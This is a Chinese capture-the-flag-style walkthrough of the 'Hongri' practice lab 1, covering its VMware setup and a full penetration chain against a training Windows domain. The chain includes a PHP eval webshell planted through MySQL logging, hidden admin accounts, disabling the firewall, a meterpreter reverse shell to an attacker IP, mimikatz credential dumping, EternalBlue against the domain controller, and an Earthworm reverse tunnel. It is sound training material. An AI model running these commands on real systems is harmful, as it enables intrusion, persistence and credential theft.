红日靶场1

发布时间:2024年01月13日


红日靶场的渗透思路

活得久爬得高的坏人,往往不会蠢,这是一件让人很无奈的事情


一、靶场搭建

红日靶场下载

网络拓扑

在这里插入图片描述

下载后解压出三个文件夹,分别对应三台靶机,密码都是`hongrisec@2019`,但只有win7可以进
kali(自带)  攻击机

win7         web服务器       

server08     域控

win2003      域成员

在这里插入图片描述

用VMware,打开文件夹中.vmx文件
kali网卡 ---- -----net模式
server2008-----VMware1
win2003---------VMware1
win7--------------两个网卡

1.win7配置

win7是web服务器,连接着外网和内网,所以需要两个网卡
第一个网卡选择------VMwear1(仅主机模式) 用于内网
第二个网卡选择------net模式 用于外网

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

使用hongrisec@2019登陆后,打开phpstudy中,apache和MySQL服务

在这里插入图片描述

2,win2003配置

在这里插入图片描述

3,server2008配置

在这里插入图片描述

4,kali配置

在这里插入图片描述

二、渗透流程

一.信息收集

C段扫描

在这里插入图片描述

端口扫描

在这里插入图片描述

目录扫描

在这里插入图片描述在这里插入图片描述

扫出三个有效的目录
 /phpmyadmin
 /phpinfo.php
 /l.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1.从这三个目录中可以得到php的版本5.4.45
2.网站的绝对路径是C:/phpStudy/WWW
3.phpmyadmin是后台,可以尝试弱密码爆破(账号密码都是root

二,获取webshell

1.进入后台之后,可以选择插入一句话木马------失败

在这里插入图片描述

报错提示,要使用into outfile函数,secure_file_priv函数要为ON
且不能被set global修改,只能在my.ini或my.conf配置文件中修改

在这里插入图片描述

在这里插入图片描述

2.在日志中插入木马

查看日志的状态
show variables like ‘%general%’;

在这里插入图片描述

修改日志状态
set global general_log=‘ON’; 执行再次查看日志状态

在这里插入图片描述

成功修改后,将日志转移到网站根目录下
set global general_log_file=‘C:/phpStudy/WWW/lzh.php’;
lzh.php是自己随便命名的

在这里插入图片描述

然后加入一句话木马
select ‘<?php @eval($_POST[c]);?>’

在这里插入图片描述
在这里插入图片描述

3.蚁剑链接

在这里插入图片描述
在这里插入图片描述

三,创建后门

1.创建隐藏用户,并加入管理员权限

net user lzh$ 123456lzh@ /add     创建隐藏用户
net localgroup administrators lzh$ /add     将用户加入管理员组
net user lzh$ /active:yes           激活用户

在这里插入图片描述

2.关闭防火墙

netsh advfirewall show allprofile state   查看防火墙状态
netsh advfirewall set allprofile state off   关闭防火墙

在这里插入图片描述在这里插入图片描述

whoami查看还是administrator权限

四,内网渗透

1.先使用msfvenom,创建木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=6666 -f exe -o hacker.exe

2.将木马程序通过蚁剑上传到网站上

在这里插入图片描述

3.kali通过msfconsole监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.32.128
set lport 6666
run

在这里插入图片描述

运行hacker.exe

在这里插入图片描述

五,内网信息收集

shell
chcp 65001 修复乱码

在这里插入图片描述

ipconfig /all
显示所有网络适配器
主机名为stu1,内网网段为192.168.52.143

在这里插入图片描述在这里插入图片描述

net user /domain
查看域用户
域内有5个用户

在这里插入图片描述

net group “domain admins” /domain ------查看域管理员

在这里插入图片描述

net config workstation ---------查看当前的域的信息

在这里插入图片描述

net time /domain ----------查找域控

得到域名,通过ping,解析域名的IP地址
192.168.52.138

在这里插入图片描述

net view /domain ---------查看本机的域

这里是引用

net view ---------查看当前域中计算机的名称

在这里插入图片描述
在这里插入图片描述

经过以上内网信息收集,得到
域内有3台主机,
//OWA, 域控:192.168.52.138
//ROOT-TVI862UBEH,域成员:192.168.52.141
//STU1win7:192.168.52.143
域内有5个用户
Administrator | Guest | krbtgt | ligang | liukaifeng01

六,提权

1| getuid    查看当前权限
2| getsystem   提权
3| getuid    验证提权

在这里插入图片描述

七,获取用户密码

在这里插入图片描述

我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中
1.首先ps查看进程
2.找一个user为system的进程----PID
3.migrate 508
4.load kiwi 加载kiwi模块
5.creds_all 这里密码我自己改过

在这里插入图片描述
在这里插入图片描述

八,横向渗透


> 使用autoroute模块,它的功能是添加去内网路由
> run post/multi/manage/autoroute    查看当前路由信息
> run autoroute -s 192.168.10.0/24        添加路由
> run autoroute -p                    查看路由信息

background相当于存档,使用session -i,可以回到存档时的位置

在这里插入图片描述

路由添加完成之后,就是扫描内网主机的端口
search portscan
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141             添加目标主机的IP地址
set ports 22,445,3389                 添加要扫描的端口,可以更多
run

在这里插入图片描述

1.ms17-010漏洞利用

发现两台主机都开放了,445端口,想到用永恒之蓝试一下

在这里插入图片描述

可以看到两台主机都有永恒之蓝的漏洞
使用模块command

2.添加后门

添加用户
use 2
set rhosts 192.168.52.138
set command net user hacker 123456hack! /add
run

将用户添加到管理员组
set command net localgroup Administrators hacker /add
run

开启远程桌面
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

3.代理内网

ew(Earthworm)内网穿透工具

git clone https://github.com/idlefire/ew.git

kali

./ew_for_linux64 -s rcsocks -l 5656 -e 9999

在这里插入图片描述meterpreter

ew_for_Win.exe -s rssocks -d 192.168.32.128 -e 9999

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

开全局代理:setg proxies socks5:127.0.0.1:5656

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

这里不知道为什么会报错,也查了资料,一无所获,就放弃了,

4.也可以尝试开代理,使用rdesktop远程连接

文章来源:https://blog.csdn.net/woshicainiao666/article/details/135396948
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。